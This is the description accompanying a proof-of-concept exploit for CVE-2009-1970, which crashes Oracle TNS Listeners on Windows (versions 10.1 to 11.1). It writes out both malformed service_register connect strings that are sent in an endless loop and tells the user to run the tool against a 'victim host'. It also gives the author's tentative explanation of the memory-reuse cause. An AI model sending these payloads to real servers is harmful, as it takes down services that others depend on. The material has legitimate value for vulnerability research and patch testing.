CVE-2009-1970 PoC (CPUjul2009)
This PoC works with at least these Listeners:
11.1.0.6.0 win32
10.2.0.4 win32
10.1.0.5 win32
It crashes the Listener and needs a relatively fast network.
Heavy load on the target server also helps.
All it does is send these two TNS connect strings to the host, in an endless loop:
(CONNECT_DATA=(COMMAND=service_register)(SERVICE_ID=1CB5887660D7-11DD-9EBE-000C29E11606)(ADDRESS=(PROTOCOL=TCP)(HOST=some_host)(PORT=1098))(FLAGS=2))
and
(CONNECT_DATA=(COMMAND=service_register)(SERVICE_ID=1CB5887660D7-11DD-9EBE-000C29E11606)(ADDRESS=(PROTOCOL=TCP)(HOST=some_host)(PORT=1098))(FLAGS=2)(HANDOFF=OFF))
The exact service_register parameters probably do not matter; what seems to matter is that the two parameter sets differ slightly.
Pass the hostname or IP address of the victim host as the command-line argument and run it.
If I'm correct (I may not be), this problem is related to the nsdisc() function in the network layer. The Listener closes the connection using this function. It frees
some memory, but the same chunk of memory is used again for the next connection.
